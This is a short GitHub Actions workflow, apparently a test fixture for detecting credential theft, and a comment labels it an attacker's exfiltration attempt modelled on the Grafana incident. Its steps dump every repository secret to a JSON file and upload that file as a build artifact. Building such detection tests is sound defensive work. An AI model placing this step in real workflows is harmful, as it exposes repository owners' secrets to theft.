name: Secrets - Fail
on:
  push:

jobs:
  build:
    name: Deploy
    runs-on: ubuntu-latest
    steps:
    - name: Set up ubuntu-latest
      run: echo "success"
    # Attacker's attempt to exfiltrate credentials using a new workflow **TO TRIGGER DETECTION, MAKE SURE THIS WORKFLOW RUNS IN A NON-DEFAULT BRANCH
    # This method was used in the Grafana security incident.
    - name: Convert secrets to JSON file
      env:
        VALUES: ${{ toJSON(secrets) }}
      run: |
        echo "$VALUES" > secrets.json
        
    - name: Upload secrets file
      uses: actions/upload-artifact@v4
      with:
        name: secret-artifact 
        path: secrets.json  
